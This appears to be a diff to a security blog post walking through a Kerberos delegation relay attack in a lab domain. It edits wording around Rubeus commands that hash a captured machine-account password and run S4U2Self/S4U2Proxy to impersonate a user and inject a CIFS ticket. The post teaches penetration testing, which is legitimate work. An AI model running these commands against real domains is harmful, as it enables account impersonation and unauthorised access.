chryzsh/chryzsh.github.io/_posts/2019-04-14-relaying-delegation.md

 ### Requesting ticket

 You can request the service ticket from Windows with [Rubeus](https://github.com/GhostPack/Rubeus).
+Now earlier when we executed the attack we got a username and a password for a new machine account in the domain.
 We have to hash the machine account password to RC4 first.
-Note that we have to escape the `'` characters as well.
+Note that we have to escape the `'` characters from the password as well.

     .\Rubeus.exe hash /password:ol@19`7+jq''''5)&

 ![](../assets/img/relaydelegation/2019-04-14-16-05-19.png)

-We then execute the two Kerberos concepts `S4U2SELF` + `S4U2Proxy` in addition to injecting the ticket into the cache.
+We then use the machine account to execute the two Kerberos concepts `S4U2SELF` + `S4U2Proxy` in addition to injecting the ticket into the cache on our attacker Windows box.
 It is all done in one operation using the `/ptt` parameter.
 Thanks [harmj0y](https://blog.harmj0y.net/)!
-We specify `s4u`, as the operations we want to performs, with the impersonating user `lkys` and the `cifs` ticket we want for `ws02.lab.local`
+We specify `s4u`, as the operations we want to perform, with the impersonating user `lkys` and the `cifs` ticket we want for `ws02.lab.local`

     .\Rubeus.exe s4u /user:LUJCDPUQ$ /impersonateuser:lkys /msdsspn:"cifs/ws02.lab.local" /ptt /rc4:3116C16787230147050F6835AFBF5EDF